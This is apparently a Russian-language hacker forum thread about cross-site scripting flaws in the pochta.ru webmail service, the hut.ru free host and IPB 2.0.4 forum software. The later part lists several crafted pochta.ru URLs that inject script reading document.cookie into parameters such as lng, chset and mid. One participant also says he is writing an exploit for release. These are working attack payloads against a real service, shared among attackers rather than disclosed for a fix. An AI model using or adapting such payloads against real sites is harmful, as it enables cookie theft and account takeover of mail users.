XSS почта.ру, hut.ru
 

1) Нашел на почта.ру вот если ее ктото находил уже то извиняюсь...
2) и еше один на hut.ru (это бесплатный хостинг)
=))
недаром говорят что все бесплатное бывает дыряво..

я на Ipb 2.0.4 нашел Xss пока сейчас пишу сплоит на него !
Думаю наднях будет релиз и видео

Во! молодец значит 2.0.4 тож дырявая..на чем пишешь сплойт и как далеко можно использовать эту багу?

на Xss сплоит????
Странно а сплоит для чего не понял?
Или он будет админа заманивать? =)

Morph, под сплойтом в данном случае имеется ввиду полноценный скрипт.

PinkPanther ага ты прав. Думаю на днях опубликую багу =)

А терь понял ступил малась =))
ИМХО.Но все же не сплоит тогда код уж.

Вообщето, и в 1.* и в 2.* изначально есть XSS. Вложеные теги.
http://antichat.ru/txt/IPB/index3.php

эээ Клез а я обрадовался ))))))) это когда в админке добавяешь форумы то в комментах к ним теги не фильтрируются =))) так как комменты можно писать из админки то следовательно для проведения хсс надо быть админом )) а если ты админ то нафиг тебе хСС?))))))))))) у меня прошло на 2.0.3 нуленой версии у Клеза на 2.0.4 наверно есть во всех версиях ))

http://www5.pochta.ru/list.php?id=N1..._create=%CE%EA

http://www3.pochta.ru/list.php?lng=en&id=N71e37161bc49873482fcf68b3e497f 5&aid=%22%3Cscript%3Ealert(document.cookie)%3C/script%3E&rid=%3Cscript%3Ealert(document.cookie)%3 C/script%3E

http://www10.pochta.ru/mailbox.php?lng=%22%3Cscript%3Ealert(document.cook ie)%3C/script%3E&id=Nd558588a9be04bfdf2a54ea6ea0ce32

http://www10.pochta.ru/mailbox.php?id=Nd558588a9be04bfdf2a54ea6ea0ce32&ch set=%22%3Cscript%3Ealert(document.cookie)%3C/script%3E

http://www10.pochta.ru/info.php?sid=&lng=&mid=%22%3Cscript%3Ealert(docume nt.cookie)%3C/script%3E

http://www10.pochta.ru/regform.php?sid=3beff5fe76e261870e27716b82a73162&l ng=%22%3Cscript%3Ealert(document.cookie)%3C/script%3E&rnd=%3Cscript%3Ealert(document.cookie)%3 C/script%3E